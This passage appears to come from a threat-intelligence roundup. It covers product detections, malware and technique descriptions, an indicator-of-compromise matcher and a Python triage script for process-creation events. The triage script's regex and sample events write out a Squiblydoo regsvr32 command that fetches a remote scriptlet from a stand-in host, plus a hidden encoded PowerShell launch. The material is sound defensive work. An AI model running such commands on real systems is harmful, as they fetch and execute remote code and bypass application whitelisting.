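               .replace("hxxps://", "https://").replace("hxxp://", "http://"))


# Constructed key=value DNS/connection records (not real telemetry).
SAMPLE_LOG = """\
ts=1622073600 src=10.0.0.7 query=www.zxyhwww.com
ts=1622073601 src=10.0.0.7 dst=110.249.213.66 dport=8080
ts=1622073602 src=10.0.0.9 query=update.microsoft.com
ts=1622073603 src=10.0.0.9 dst=110.249.213.6 dport=443
""".splitlines()


def build_matcher(iocs: List[str]) -> "re.Pattern":
    """One alternation over all refanged IOCs, bounded by non-word characters.

    The (?!\\w) lookahead keeps 110.249.213.6 from matching inside
    110.249.213.66 and vice versa; a leading '.' is still allowed so that a
    subdomain of a listed domain (a.www.zxyhwww.com) also matches.
    """
    escaped = "|".join(re.escape(refang(i)) for i in iocs)
    return re.compile(r"(?<!\w)(%s)(?!\w)" % escaped, re.IGNORECASE)


def hunt(lines: List[str], iocs: List[str] = DEFANGED_IOCS) -> List[Tuple[int, str]]:
    """Return (line number, matched IOC) pairs for every IOC occurrence."""
    rx = build_matcher(iocs)
    hits = []
    for n, line in enumerate(lines, 1):
        for m in rx.finditer(line):
            hits.append((n, m.group(1)))
    return hits


if __name__ == "__main__":
    for n, ioc in hunt(SAMPLE_LOG):
        print("line %d: %s" % (n, ioc))
```

Line 4 contains `110.249.213.6`, a different host that shares a prefix with the listed IP; the word-boundary lookahead is what keeps it out of the results.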

File Hashes

Coverage

Product    Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP

ThreatGrid

MITRE ATT&CK


Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

Process hollowing detected - (10061)
Process hollowing is a technique used by some programs to evade static analysis and process-based detection. In typical usage, a packed loader unpacks its obfuscated or encrypted payload into memory, then starts a legitimate child process in a suspended state. Before the child's main thread runs, the parent unmaps the child's original image and writes the unpacked payload into its address space, so the malicious code executes under the name and apparent identity of the legitimate process.
Excessively long PowerShell command detected - (4737)
A PowerShell command with a very long command line argument, which may indicate an obfuscated or encoded script, has been detected. PowerShell is an extensible Windows scripting language present on all modern versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats.
Reverse TCP payload detected - (3026)
An exploit payload intended to connect back to an attacker-controlled host over TCP has been detected.
Crystalbit-Apple DLL double hijack detected - (1480)
Crystalbit-Apple DLL double hijack was detected. During this attack, the adversary abuses two legitimate vendor applications, such as CrystalBit and Apple, as part of a DLL double-hijack attack chain that starts with a fraudulent software bundle and eventually leads to a persistent miner and, in some cases, spyware deployment.
Squiblydoo application whitelist bypass attempt detected. - (841)
An attempt to bypass application whitelisting via the "Squiblydoo" technique has been detected. This typically involves using the signed Windows binary regsvr32.exe, together with scrobj.dll, to fetch and execute scriptlet (.sct) content hosted on an attacker-controlled server.
Kovter injection detected - (633)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click-fraud Trojan that can also act as an information stealer. Kovter is also fileless malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
A Microsoft Office process has started a windows utility. - (594)
A process associated with Microsoft Office, such as EXCEL.exe or WINWORD.exe, has started a Windows utility such as powershell.exe or cmd.exe. This is typical behavior of malicious documents executing additional scripts. This behavior is extremely suspicious and is associated with many different malware campaigns and families.
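Three of the behaviors described in this section (an excessively long PowerShell command line, the Squiblydoo regsvr32/scrobj.dll pattern, and an Office process spawning a Windows utility) can all be expressed as checks over process-creation telemetry. The script below is an added example, not Talos or AMP code: it runs those three checks over a few constructed process-creation events. The event fields, the 1000-character PowerShell threshold and the binary lists are assumptions to be tuned for a real environment.

```python
"""Toy triage of process-creation events for three behaviors listed above.

Added example, not Talos/AMP code. The event shape (parent image, image,
command line), the threshold and the sample events are assumptions.
"""
import re
from typing import Dict, List, NamedTuple

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
LOLBIN_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                   "cscript.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe"}
LONG_PS_THRESHOLD = 1000  # assumed; tune to your own baseline

# Squiblydoo: regsvr32 told to run a scriptlet from a URL via scrobj.dll,
# e.g. regsvr32 /s /n /u /i:http://host/x.sct scrobj.dll
SQUIBLYDOO_RE = re.compile(r"/i:\s*(?:https?|ftp)://.*scrobj\.dll", re.IGNORECASE)


class ProcEvent(NamedTuple):
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(ev: ProcEvent) -> List[str]:
    """Return the names of the checks that fire for one event."""
    hits = []
    parent, child = basename(ev.parent_image), basename(ev.image)
    if parent in OFFICE_PARENTS and child in LOLBIN_CHILDREN:
        hits.append("office_spawned_utility")
    if child in {"powershell.exe", "pwsh.exe"} and len(ev.command_line) > LONG_PS_THRESHOLD:
        hits.append("excessively_long_powershell")
    if child == "regsvr32.exe" and SQUIBLYDOO_RE.search(ev.command_line):
        hits.append("squiblydoo_regsvr32")
    return hits


# Constructed sample events, not real telemetry. Event 0 is the Office ->
# cmd.exe hop; the long PowerShell it launches shows up as its own event (1).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c powershell -nop -w hidden -enc " + "A" * 1200),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -nop -w hidden -enc " + "A" * 1200),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\regsvr32.exe",
              "regsvr32 /s /n /u /i:http://example.invalid/x.sct scrobj.dll"),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe Get-Process"),
]


def triage_all(events: List[ProcEvent] = SAMPLE_EVENTS) -> Dict[int, List[str]]:
    """Map event index to the list of checks that fired."""
    return {i: triage(e) for i, e in enumerate(events)}


if __name__ == "__main__":
    for i, hits in triage_all().items():
        print(i, hits or "clean")
```

The last event, an interactive `Get-Process`, is there to show that a PowerShell launch by itself fires nothing; it is the length, the parent, or the regsvr32 argument shape that each check keys on.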
Trickbot malware detected - (519)
Trickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected that some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving since it appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching.
Dealply adware detected - (400)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
CVE-2019-0708 detected - (121)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption (a use-after-free in the RDP kernel driver termdd.sys) which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered before authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.